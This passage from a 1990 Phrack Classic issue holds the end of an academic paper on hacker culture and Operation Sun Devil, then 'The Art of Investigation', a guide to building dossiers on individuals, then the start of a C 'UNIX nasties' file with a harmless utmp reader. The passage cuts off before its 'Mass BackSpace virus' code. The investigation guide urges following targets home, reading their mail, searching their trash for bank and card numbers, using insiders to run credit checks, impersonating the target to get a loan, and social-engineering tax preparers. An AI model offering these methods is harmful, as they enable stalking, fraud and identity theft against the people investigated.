to contain a Privacy Act Statement that states how the information
|
|
being collected will be used and, in some cases, giving the option
|
|
of withholding the information.
|
|
|
|
Goldstein has also challenged the practices of law enforcement agencies
|
|
in their attempt to crack down on hackers (Goldstein90). He said
|
|
that all incoming and outgoing electronic mail used by ``Phrack''
|
|
was monitored before the newsletter was shutdown by authorities.
|
|
``Had a printed magazine been shut down in this fashion after having
|
|
all of their mail opened and read, even the most thick-headed
|
|
sensationalist media types would have caught on: hey, isn't that
|
|
a violation of the First Amendment?'' He also cites the shutdown
|
|
of several bulletin boards as part of Operation Sun Devil, and quotes
|
|
the administrator of the bulletin board Zygot as saying ``Should
|
|
I start reading my users' mail to make sure they aren't saying anything
|
|
naughty? Should I snoop through all the files to make sure everyone
|
|
is being good? This whole affair is rather chilling.'' The
|
|
administrator for the public system The Point wrote ``Today, there
|
|
is no law or precedent which affords me ... the same legal rights
|
|
that other common carriers have against prosecution should some other
|
|
party (you) use my property (The Point) for illegal activities.
|
|
That worries me ...''
|
|
|
|
About 40 personal computer systems and 23,000 data disks were seized
|
|
under Operation Sun Devil, a two-year investigation involving the
|
|
FBI, Secret Service, and other federal and local law enforcement
|
|
officials. In addition, the Secret Service acknowledges that its
|
|
agents, acting as legitimate users, had secretly monitored computer
|
|
bulletin boards (Markoff90a). Markoff reports that California
|
|
Representative Don Edwards, industry leader Mitchell Kapor, and civil
|
|
liberties advocates are alarmed by these government actions, saying
|
|
that they challenge freedom of speech under the First Amendment and
|
|
protection against searches and seizures under the Fourth Amendment.
|
|
Markoff asks: ``Will fear of hackers bring oppression?''
|
|
|
|
John Barlow writes ``The Secret Service may actually have done a
|
|
service for those of us who love liberty. They have provided us
|
|
with a devil. And devils, among their other galvanizing virtues,
|
|
are just great for clarifying the issues and putting iron in your
|
|
spine,'' (Barlow90). Some of the questions that Barlow says need
|
|
to be addressed include ``What are data and what is free speech?
|
|
How does one treat property which has no physical form and can be
|
|
infinitely reproduced? Is a computer the same as a printing press?''
|
|
Barlow urges those of us who understand the technology to address
|
|
these questions, lest the answers be given to us by law makers and
|
|
law enforcers who do not. Barlow and Kapor are constituting a
|
|
foundation to ``raise and disburse funds for education, lobbying,
|
|
and litigation in the areas relating to digital speech and the
|
|
extension of the Constitution into Cyberspace.''
|
|
|
|
8. Conclusions
|
|
|
|
|
|
Hackers say that it is our social responsibility to share information,
|
|
and that it is information hoarding and disinformation that are the
|
|
crimes. This ethic of resource and information sharing contrasts
|
|
sharply with computer security policies that are based on authorization
|
|
and ``need to know.'' This discrepancy raises an interesting question:
|
|
Does the hacker ethic reflect a growing force in society that stands
|
|
for greater sharing of resources and information -- a reaffirmation
|
|
of basic values in our constitution and laws? It is important that
|
|
we examine the differences between the standards of hackers, systems
|
|
managers, users, and the public. These differences may represent
|
|
breakdowns in current practices, and may present new opportunities
|
|
to design better policies and mechanisms for making computer resources
|
|
and information more widely available.
|
|
|
|
The sentiment for greater information sharing is not restricted to
|
|
hackers. In the best seller, ``Thriving on Chaos,'' Tom Peters
|
|
(Peters87) writes about sharing within organizations: ``Information
|
|
hoarding, especially by politically motivated, power-seeking staffs,
|
|
has been commonplace throughout American industry, service and
|
|
manufacturing alike. It will be an impossible millstone around the
|
|
neck of tomorrow's organizations. Sharing is a must.'' Peters argues
|
|
that information flow and sharing is fundamental to innovation and
|
|
competitiveness. On a broader scale, Peter Drucker (Drucker89) says
|
|
that the ``control of information by government is no longer possible.
|
|
Indeed, information is now transnational. Like money, it has no
|
|
`fatherland.' ''
|
|
|
|
Nor is the sentiment restricted to people outside the computer security
|
|
field. Harry DeMaio (DeMaio89) says that our natural urge is to
|
|
share information, and that we are suspicious of organizations and
|
|
individuals who are secretive. He says that information is exchanged
|
|
out of ``want to know'' and mutual accommodation rather than ``need
|
|
to know.'' If this is so, then some of our security policies are
|
|
out of step with the way people work. Peter Denning (DenningP89)
|
|
says that information sharing will be widespread in the emerging
|
|
worldwide networks of computers and that we need to focus on ``immune
|
|
systems'' that protect against mistakes in our designs and recover
|
|
from damage.
|
|
|
|
I began my investigation of hackers with the question, who are they
|
|
and what is their culture and discourse? My investigation uncovered
|
|
some of their concerns, which provided the organizational structure
|
|
to this paper, and several suggestions for new actions that might
|
|
be taken. My investigation also opened up a broader question: What
|
|
conflict in society do hackers stand at the battle lines of? Is
|
|
it owning or restricting information vs. sharing information -- a
|
|
tension between an age-old tradition of controlling information as
|
|
property and the Englightenment tradition of sharing and disseminating
|
|
information? Is it controlling access based on ``need to know,''
|
|
as determined by the information provider, vs. ``want to know,''
|
|
as determined by the person desiring access? Is it law enforcement
|
|
vs. freedoms granted under the First and Fourth Amendments? The
|
|
answers to these questions, as well as those raised by Barlow on
|
|
the nature of information and free speech, are important because
|
|
they tell us whether our policies and practices serve us as well
|
|
as they might. The issue is not simply hackers vs. system managers
|
|
or law enforcers; it is a much larger question about values and
|
|
practices in an information society.
|
|
|
|
|
|
Acknowledgments
|
|
|
|
I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
|
|
Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
|
|
Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
|
|
Alex for their comments on earlier versions of this paper and helpful
|
|
discussions; to Richard Stallman for putting me in contact with
|
|
hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
|
|
Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
|
|
and Richard Pethia for a summary of some of his experiences at CERT.
|
|
The opinions expressed here, however, are my own and do not necessarily
|
|
represent those of the people mentioned above or of Digital Equipment
|
|
Corporation.
|
|
|
|
|
|
References
|
|
|
|
|
|
ACM90
|
|
``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
|
|
|
|
Baird87
|
|
Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
|
|
Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
|
|
p. 471-478.
|
|
|
|
Barlow90
|
|
John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
|
|
Earth Review.
|
|
|
|
Corley89
|
|
Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
|
|
Protection, Bantam Books, New York, 1989, p. 67-72.
|
|
|
|
DeMaio89
|
|
Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
|
|
Proc. of the 12th National Computer Security Conference, 1989,
|
|
p. 630-633.
|
|
|
|
DenningP89
|
|
Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
|
|
Sept.-Oct., 1989.
|
|
|
|
DenningP90
|
|
Peter J. Denning, Computers Under Attack, ACM Press, 1990.
|
|
|
|
Dibbel90
|
|
Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
|
|
|
|
Drucker89
|
|
Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
|
|
|
|
Felsenstein86
|
|
Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
|
|
ACM Panel on Hacking (Lee86).
|
|
|
|
Frenkel87
|
|
Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
|
|
Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
|
|
|
|
Goldstein89
|
|
Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
|
|
Spring 1989.
|
|
|
|
Goldstein90
|
|
Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
|
|
No. 1, Spring 1990.
|
|
|
|
Goodfellow83
|
|
Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
|
|
Transportation, Aviation, and Materials on the Subject of
|
|
Telecommunications Security and Privacy,'' Sept. 26, 1983.
|
|
|
|
Hafner90
|
|
Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
|
|
p. 15-16.
|
|
|
|
Harpers90
|
|
``Is Computer Hacking a Crime?" Harper's, March 1990, p. 45-57.
|
|
|
|
Harvey86
|
|
Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
|
|
ACM Panel on Hacking (Lee86).
|
|
|
|
HollingerLanza-Kaduce88
|
|
Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
|
|
Criminalization: The Case of Computer Crime Laws,'' Criminology,
|
|
Vol. 26, No. 1, 1988, p. 101-126.
|
|
|
|
Huebner89
|
|
Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
|
|
Vol. 8, Issue 37, 1989.
|
|
|
|
Landreth89
|
|
Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
|
|
|
|
Lee86
|
|
John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
|
|
Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
|
|
Vol. 29, No. 4, April 1986, p. 297-299; full report available from
|
|
ACM Headquarters, New York.
|
|
|
|
Levy84
|
|
Steven Levy, Hackers, Dell, New York, 1984.
|
|
|
|
Markoff90
|
|
John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
|
|
The New York Times, March 19, 1990.
|
|
|
|
Markoff90a
|
|
John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
|
|
The New York Times, June 3, 1990.
|
|
|
|
Martin89
|
|
Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
|
|
Proc. of the 12th National Computer Security Conference, 1989.
|
|
|
|
Meyer89
|
|
Gordon R. Meyer, The Social Organization of the Computer Underground,
|
|
Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
|
|
1989.
|
|
|
|
MeyerThomas90
|
|
Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
|
|
A Postmodernist Interpretation of the Computer Underground,'' Dept.
|
|
of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
|
|
|
|
Peters87
|
|
Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
|
|
p. 610, 1987.
|
|
|
|
Spafford89
|
|
Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
|
|
Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
|
|
|
|
Stallman84
|
|
Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
|
|
No. 1, Jan. 1984, p. 8-9.
|
|
|
|
Stallman90
|
|
Richard M. Stallman, ``Against User Interface Copyright'' to appear
|
|
in Comm. ACM.
|
|
|
|
Steele83
|
|
Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
|
|
Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow, The
|
|
Hacker's Dictionary, Harper & Row, New York, 1983.
|
|
|
|
Stoll90
|
|
Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
|
|
|
|
Thomas90
|
|
Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
|
|
Digest, Issue #1.06, April 27, 1990.
|
|
|
|
ThomasMeyer90
|
|
Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
|
|
(Witch)Hunting for the Computer Underground,'' Unpublished
|
|
manuscript, Department of Sociology, Northern Illinois University,
|
|
DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
|
|
1, Issue 11, June 16, 1990.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #4 of 12
|
|
|
|
|
|
***** T H E A R T O F I N V E S T I G A T I O N *****
|
|
***** *****
|
|
***** *****
|
|
***** Brought to You By *****
|
|
***** *****
|
|
***** The Butler *****
|
|
***** *****
|
|
***** 10/31/90 *****
|
|
***** *****
|
|
***** *****
|
|
|
|
There are many ways to obtain information about individuals. I am going to
|
|
cover some of the investigative means of getting the low down on people whom
|
|
you wish to know more about.
|
|
|
|
Some of the areas I will cover are:
|
|
|
|
Social Security Checks
|
|
Driving/Vehicular Records
|
|
Police Reports
|
|
FBI Records
|
|
Insurance Records
|
|
Legal Records
|
|
Credit Bureau Checks
|
|
Probate Records
|
|
Real Estate Records
|
|
Corporate Records
|
|
Freedom Of Information Act
|
|
Governmental Agency Records
|
|
Maps
|
|
Tax Records
|
|
|
|
To obtain information from some organizations or some individuals one must be
|
|
able to "BULLSHIT"!!! Not only by voice but in writing. Many times you must
|
|
write certain governmental bodies requesting info and it can only be done in
|
|
writing. I can't stress enough the need for proper grammer and spelling.
|
|
|
|
For you to obtain certain information about another person you must first
|
|
get a few KEY pieces of info to make your investigation easier. The persons
|
|
Full Name, Social Security Number, Date & Place of Birth will all make your
|
|
search easier and more complete.
|
|
|
|
First of all in most cases you will know the persons name you want to invest-
|
|
igate. If not you must obtain it any way you can. First you could follow them
|
|
to their home and get their address. Then some other time when they are gone
|
|
you could look at their mail or dig through their trash to get their Full Name.
|
|
While in their trash you might even be able to dig up more interesting info
|
|
like: Bank Accout Numbers, Credit Card Numbers, Social Security Number, Birth
|
|
Day, Relatives Names, Long Distance Calls Made, etc.
|
|
|
|
If you can't get to their trash for some reason take their address to your
|
|
local library and check it against the POLKS and COLES Directories. This
|
|
should provide you with their Full Name, Phone Number, Address, and how long
|
|
they have lived at the current location.
|
|
|
|
You can also check the Local Phone Book, Directory Assistance, City Directories,
|
|
Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
|
|
electric, phone, cable, etc.)
|
|
|
|
If you know someone who works at a bank or car dealer you could have them run
|
|
a credit check which will reveal all of their credit cards and if they have
|
|
ever had any late payments or applied for any loans. If you are brave enough
|
|
you could even apply for a loan impersonating the individual under investigation
|
|
|
|
The Credit Bureau also has Sentry Services that can provide deceased social
|
|
security numbers, postal drop box address and known fraudulent information.
|
|
|
|
You can get an individuals driving record by sending a letter to your states
|
|
Department of Revenue, Division of Vehicles. You can also get the following:
|
|
|
|
Driver Control Bureau
|
|
For Driving Record send Name, Address, Date of Birth and usually a $1 process-
|
|
ing fee for a 5 year record.
|
|
|
|
Titles & Registration Bureau
|
|
For ownership information (current and past).
|
|
|
|
Driver License Examination Bureau
|
|
To see what vision was rated.
|
|
|
|
Motor Carrier Inspection & Registration Bureau
|
|
To check on licensing and registration of trucks/trucking companies.
|
|
|
|
Revocation Dept
|
|
Can verify if someone's driver's license has ever been suspended or revoked.
|
|
|
|
You can even obtain a complete vehicle history by sending the vehicle descrip-
|
|
tion, identification # for the last registered owner, and a small fee. Send
|
|
this info to your states Dept of Vehicles. It is best to contact them first
|
|
to get their exact address and fees. I would advise using a money orders and
|
|
a P.O. Box so they cannot trace it to you without a hassle.
|
|
|
|
Police Records
|
|
|
|
All Police and Fire Records are Public record unless the city is involved.
|
|
You can usually get everything available from the police dept including:
|
|
Interviews, maps, diagrams, misc reports, etc.
|
|
|
|
|
|
FBI Records
|
|
|
|
If the individual you are inquiring about is deceased the FBI will provide
|
|
some info if you give them Full Name, SSN, Date & Place of Birth. Contact
|
|
you local FBI office to get the details.
|
|
|
|
|
|
Real Estate Records
|
|
|
|
Recorder of Deeds offices in each county maintain land ownership records.
|
|
Most are not computerized and you have to manually search. Then you must
|
|
review microfilm/fiche for actual deeds of trust, quit claim deeds,
|
|
assignments, mortgage, liens, etc.
|
|
|
|
A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
|
|
which will show ownership, mortgage info, easements, taxes owned, taxes
|
|
assessed, etc.
|
|
|
|
Most county assessors will provide an address and value of any real property
|
|
if you request a search by name.
|
|
|
|
|
|
Social Security Records
|
|
|
|
Social Security Administrator
|
|
Office of Central Records Operations
|
|
300 North Greene Street
|
|
Baltimore, Maryland 21201
|
|
301-965-8882
|
|
|
|
Title II and Title XVI disability claims records, info regarding total earnings
|
|
for each year, detailed earnings information show employer, total earnings, and
|
|
social security paid for each quarter by employer.
|
|
|
|
Prices are approximately as follows:
|
|
|
|
1st year of records $15.00
|
|
2nd-5th year of records $ 2.50 per person
|
|
6th-10th year of records $ 2.00 per person
|
|
11th-15th year of records $ 1.50 per person
|
|
16th-on year of records $ 1.00 per person
|
|
|
|
** Call for verification of these prices. **
|
|
|
|
Social Security records are a great source of information when someone has
|
|
been relatively transient in their work, or if they are employed out of a
|
|
union hall.
|
|
|
|
If you want to review a claim file, direct your request to the Baltimore
|
|
office. They will send the file to the social security office in your city
|
|
for you to review and decide what you want copies of.
|
|
|
|
The first three digits of a social security number indicate the state of
|
|
application.
|
|
|
|
The Social Security Number
|
|
|
|
SSA has continually emphasized the fact that the SSN identifies a particular
|
|
record only and the Social Security Card indicates the person whose record is
|
|
identified by that number. In no way can the Social Security Card identify
|
|
the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
|
|
on the face of the card. However, many people ignored the message and the
|
|
legend was eventually dropped. The social security number is the most widely
|
|
used and carefully controlled number in the country, which makes it an
|
|
attractive identifier.
|
|
|
|
With the exception of the restrictions imposed on Federal and some State and
|
|
local organizations by the Privacy Act of 1974, organizations requiring a
|
|
unique identifier for purposes of controlling their records are not prohibited
|
|
from using (with the consent of the holder) the SSN. SSA records are
|
|
confidential and knowledge of a person's SSN does not give the user access to
|
|
information in SSA files which is confidential by law.
|
|
|
|
Many commercial enterprises have used the SSN in various promotional efforts.
|
|
These uses are not authorized by SSA, but SSA has no authority to prohibit
|
|
such activities as most are not illegal. Some of these unauthorized uses are:
|
|
SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
|
|
pocketbook numbers (the numbers used on sample social security cards in
|
|
wallets); misleading advertising, commercial enterprises charging fees for SSN
|
|
services; identification of personal property.
|
|
|
|
The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
|
|
the Area, Group, and Serial. For the most part, (there are exceptions), the
|
|
Area is determined by where the individual APPLIED for the SSN (before 1972)
|
|
or RESIDED at time of application (after 1972). The areas are assigned as
|
|
follows:
|
|
|
|
000 unused 387-399 WI 528-529 UT
|
|
001-003 NH 400-407 KY 530 NV
|
|
004-007 ME 408-415 TN 531-539 WA
|
|
008-009 VT 416-424 AL 540-544 OR
|
|
010-034 MA 425-428 MS 545-573 CA
|
|
035-039 RI 429-432 AR 574 AK
|
|
040-049 CT 433-439 LA 575-576 HI
|
|
050-134 NY 440-448 OK 577-579 DC
|
|
135-158 NJ 449-467 TX 580 VI Virgin Islands
|
|
159-211 PA 468-477 MN 581-584 PR Puerto Rico
|
|
212-220 MD 478-485 IA 585 NM
|
|
221-222 DE 486-500 MO 586 PI Pacific Islands*
|
|
223-231 VA 501-502 ND 587-588 MS
|
|
232-236 WV 503-504 SD 589-595 FL
|
|
237-246 NC 505-508 NE 596-599 PR Puerto Rico
|
|
247-251 SC 509-515 KS 600-601 AZ
|
|
252-260 GA 516-517 MT 602-626 CA
|
|
261-267 FL 518-519 ID *Guam, American Samoa,
|
|
268-302 OH 520 WY Northern Mariana Islands,
|
|
303-317 IN 521-524 CO Philippine Islands
|
|
318-361 IL 525 NM
|
|
362-386 MI 526-527 AZ
|
|
|
|
627-699 unassigned, for future use
|
|
|
|
700-728 Railroad workers through 1963, then discontinued
|
|
729-899 unassigned, for future use
|
|
900-999 not valid SSNs, but were used for program purposes
|
|
when state aid to the aged, blind and disabled was
|
|
converted to a federal program administered by SSA.
|
|
|
|
As the Areas assigned to a locality are exhausted, new areas from the pool are
|
|
assigned. This is why some states have non-contiguous groups of Areas.
|
|
|
|
The Group portion of the SSN has no meaning other than to determine whether or
|
|
not a number has been assigned. SSA publishes a list every month of the
|
|
highest group assigned for each SSN Area. The order of assignment for the
|
|
Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
|
|
except for 00 which is never used, and odd numbers over 10. For example, if the
|
|
highest group assigned for area 999 is 72, then we know that the number
|
|
999-04-1234 is an invalid number because even Groups under 9 have not yet been
|
|
assigned.
|
|
|
|
The Serial portion of the SSN has no meaning. The Serial is not assigned in
|
|
strictly numerical order. The Serial 0000 is never assigned.
|
|
|
|
Before 1973, Social Security Cards with pre-printed numbers were issued to
|
|
each local SSA office. The numbers were assigned by the local office. In 1973,
|
|
SSN assignment was automated and outstanding stocks of pre-printed cards were
|
|
destroyed. All SSNs are now assigned by computer from headquarters. There
|
|
are rare cases in which the computer system can be forced to accept a manual
|
|
assignment such as a person refusing a number with 666 in it.
|
|
|
|
A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
|
|
an explanation of the SSN's structure and the method of assigning and
|
|
validating Social Security numbers.
|
|
|
|
|
|
Tax Records
|
|
|
|
If you can find out who does the individuals taxes you might be able to get
|
|
copies from them with the use of creative social engineering.
|
|
|
|
If you want to run a tax lien search there is a service called Infoquest.
|
|
1-800-777-8567 for a fee. Call with a specific request.
|
|
|
|
|
|
Post Office Records
|
|
|
|
If you have an address for someone that is not current, always consider writing
|
|
a letter to the postmaster of whatever post office branch services the zip code
|
|
of the missing person. Provide them the name and the last known address and
|
|
simply ask for the current address. There might be a $1 fee for this so it
|
|
would be wise to call first.
|
|
|
|
City Directory, Polk's, Cole's, etc.
|
|
|
|
Information in these directories is contained alphabetically by name,
|
|
geographically by street address, and numerically by telephone number, so if
|
|
you have any of those three pieces of info, a check can be done. The Polk's
|
|
directory also shows whether the person owns their home or rents, their marital
|
|
status, place of employment, and a myriad of other tidbits of information.
|
|
However, these books are not the be-all and end-all of the information as they
|
|
are subject to public and corporate response to surveys. These directories are
|
|
published on a nationwide basis so if you are looking for someone outside of
|
|
your area, simply call the public library in the area you have an interest and
|
|
they also can perform a crisscross check for you.
|
|
|
|
You can also call a service owned by Cole's called the National Look up Library
|
|
at 402-473-9717 and either give a phone number and get the name & address or
|
|
give the address and get the name and phone number. This is only available to
|
|
subscribers, which costs $183.00 dollars for 1991. A subscriber gets two free
|
|
lookups per day and everyone after that costs $1.25. A subscriber can also mail
|
|
in a request for a lookup to:
|
|
|
|
National Look Up Library
|
|
901 W. Bond Street
|
|
Lincoln, NE 68521-3694
|
|
|
|
A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
|
|
detailed financial analysis of any bank.
|
|
|
|
505 Barton Springs Road
|
|
Austin, Texas 78704
|
|
512-472-2244
|
|
|
|
Professional Credit Checker & Nationwide SSN-locate.
|
|
|
|
!Solutions! Publishing Co.
|
|
8016 Plainfield Road
|
|
Cincinnati, Ohio 45236
|
|
513-891-6145
|
|
1-800-255-6643
|
|
|
|
Top Secret Manuals
|
|
|
|
Consumertronics
|
|
2011 Crescent Drive
|
|
P.O. Drawer 537-X
|
|
Alamogordo, New Mexico 88310
|
|
505-434-0234
|
|
|
|
|
|
Federal Government Information Center is located at
|
|
|
|
1520 Market Street
|
|
St. Louis, Missouri
|
|
1-800-392-7711
|
|
|
|
|
|
U.S. Dept of Agriculture has located aerial photos of every inch of the United
|
|
States.
|
|
|
|
2222 West 2300 S.
|
|
P.O. Box 36010
|
|
Salt Lake City, Utah 84130
|
|
801-524-5856
|
|
|
|
|
|
To obtain general information regarding registered agent, principals, and good
|
|
standing status, simply call the Corporate Division of the Secretary of State
|
|
and they will provide that information over the phone. Some corporate divisions
|
|
are here:
|
|
|
|
Arkansas Corporate Division 501-371-5151
|
|
Deleware Corporate Division 302-736-3073
|
|
Georgia Corporate Division 404-656-2817
|
|
Indiana Corporate Division 317-232-6576
|
|
Kansas Corporate Division 913-296-2236
|
|
Louisiana Corporate Division 504-925-4716
|
|
Missouri Corporate Division 314-751-4936
|
|
New York Corporate Division 518-474-6200
|
|
Texas Corporate Division 512-475-3551
|
|
|
|
|
|
Freedom Of Information
|
|
|
|
The Freedom of Information Act allows the public to request information
|
|
submitted to, or generated by, all executive departments, military departments,
|
|
government or government controlled corporations, and regulatory agencies. Each
|
|
agency, as described above, publishes in the Federal Register, descriptions of
|
|
its central and field organizations and places where and how requests are to be
|
|
directed. Direct a letter to the appropriate person designated in the Federal
|
|
Register requesting reasonably described records be released to you pursuant to
|
|
the Freedom of Information Act. Be sure to follow each agency's individually
|
|
published rules which state the time, place, fees, and procedures for the
|
|
provisions of information. The agency should promptly respond.
|
|
|
|
How to Find Information About Companies, Ed. II, 1981, suggests, "Government
|
|
personnel you deal with sometimes become less helpful if you approach the
|
|
subject by threatening the Freedom of Information Act action - it's best to ask
|
|
for the material informally first." While this will probably enable you to find
|
|
the correct person to send your request to, be prepared to spend at least half
|
|
an hour on the phone talking to several people before you find the person who
|
|
can help you. The book also has a brief description of what each governmental
|
|
agency handles.
|
|
|
|
If you want to see if someone you are trying to locate is a veteran, has a
|
|
federal VA loan, or receives some sort of disability benefit, use Freedom
|
|
of Information and provide the person's SSN.
|
|
|
|
You will get a bill but you can ask for a fee waiver if this contributes to a
|
|
public understanding of the operation of the government. You can also request
|
|
an opportunity to go through the files yourself and then decide what you want
|
|
copied.
|
|
|
|
|
|
Insurance Records
|
|
|
|
PIP carrier records (may contain statements, medical records, new doctors/
|
|
hospital names, records of disability payments, adjuster's opinions,
|
|
applications for insurance coverage, other claim info, etc.)
|
|
|
|
Health insurance records (may contain medical records, record of bills, new
|
|
doctors/hospital names, pre-existing conditions information, info regarding
|
|
other accidetns/injuries, etc.)
|
|
|
|
Often you will have to go through the claims office, the underwriting dept, and
|
|
the business office to get complete records as each individual dept maintains
|
|
its own seperate files.
|
|
|
|
|
|
Workers Compensation
|
|
|
|
Some states will let you simply request records. Just submit your request
|
|
including the SSN and Birthdate, to the Department of Human Resources, Division
|
|
of Worker's Compensation. They will photocopy the records and send you the
|
|
copies. Other states require an authorization to obtain these records.
|
|
|
|
|
|
You can always call your local Private Investigator pretending you are a
|
|
student doing a research paper on the methods of getting personal information
|
|
about people or even trash his place to find tips on tracking down people.
|
|
|
|
I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
|
|
by The Butler will...........
|
|
|
|
|
|
Till Next Time,
|
|
|
|
|
|
The Butler...
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #5 of 12
|
|
|
|
|
|
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
|
|
%P P%
|
|
%H C UNIX `nasties' PART I H%
|
|
%A by A%
|
|
%Z Sir Hackalot of PHAZE (10/20/90) Z%
|
|
%E E%
|
|
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
|
|
|
|
|
|
o Purpose of this file:
|
|
|
|
The purpose of this file is to share small C programs for the Unix
|
|
System V and/or BSD 4.3 operating systems which as in logical terms,
|
|
"Nasty". This "Nasty" can be termed better as Annoyance programs
|
|
or tricky programs.
|
|
|
|
The purpose of this text however, is NOT to teach one how to program
|
|
in C and or how to use the C compiler on Unix systems. This textfile
|
|
assumes you have a working knowledge of programming with C in the
|
|
UNIX environment.
|
|
|
|
|
|
|
|
o The UTMP Reader:
|
|
~~~~~~~~~~~~~~~~
|
|
|
|
First, I would like to start this text off by posting in a generic
|
|
/etc/utmp reader. The /etc/utmp reader is essential for applications
|
|
that deal with all the users online at a given time.
|
|
|
|
Here is the source:
|
|
|
|
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
|
|
|
|
|
|
/* WhatTTY -- Generic WHO
|
|
UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
|
|
|
|
This is basically a skeleton program that is just a base for any UTMP
|
|
operations.
|
|
|
|
This is the skeleton that PhaZe(soft) uses for anything that deals
|
|
with reading the utmp file, such as MBS, SEND, VW, MME, and other
|
|
utilities.
|
|
|
|
Applications: You can use this when you need to do something to
|
|
everyone online, or when you need some sort of data from utmp, wtmp
|
|
or any file that is like utmp.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <sys/types.h> /* This is the key to the whole thing */
|
|
#include <utmp.h>
|
|
#include <fcntl.h>
|
|
|
|
|
|
main()
|
|
{
|
|
int handle;
|
|
char *etc = "/etc/utmp";
|
|
struct utmp user;
|
|
|
|
handle = open(etc,O_RDONLY);
|
|
|
|
while(read(handle,&user,sizeof(user)) != 0) {
|
|
if (user.ut_type == USER_PROCESS)
|
|
printf("%s is on %s\n",user.ut_name,user.ut_line);
|
|
}
|
|
close(handle);
|
|
|
|
/* Simple, Right? */
|
|
/* To see anything that is waiting for a login, change USER_PROCESS
|
|
to LOGIN_PROCESS */
|
|
}
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
In the above program, this is what happens:
|
|
1. I assigned the variable "etc" to point at the string
|
|
"/etc/utmp", which is the utmp file.
|
|
2. I opened in in Read ONLY mode (O_RDONLY).
|
|
3. I started a loop that does not end until 0 bytes are
|
|
read into the user structure. The 0 bytes would mean
|
|
end of file.
|
|
|
|
Notice the line:
|
|
if (user.ut_type == USER_PROCESS)
|
|
|
|
What the above line does is to distinguish between a user
|
|
and a terminal waiting for a Login. The ut_type is defined
|
|
in utmp.h. There are many types. One of them is LOGIN_PROCESS.
|
|
That will be a terminal waiting for a login. If you wanted to see
|
|
all the TTYs waiting to be logged in on, you would change the
|
|
USER_PROCESS to LOGIN_PROCESS. Other types are things like
|
|
INIT_PROCESS. You can just look in utmp.h to see them.
|
|
|
|
Also notice that I have inclide "sys/types.h". If you do not include
|
|
this file, there will be an error in utmp.h, and other headers.
|
|
types.h has definitions for other TYPES of data, etc. So, if in
|
|
a header file you encounter a syntax error, you might need to include
|
|
sys/types.h
|
|
|
|
This program is just a skeleton, although it does print out who
|
|
is logged on, and to what TTY they are on. You will see how this
|
|
skeleton I wrote can be used. I used it to write MBS.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
o MBS -- Mass BackSpace virus:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
MBS may not be considered a virus, since it does not replicate
|
|
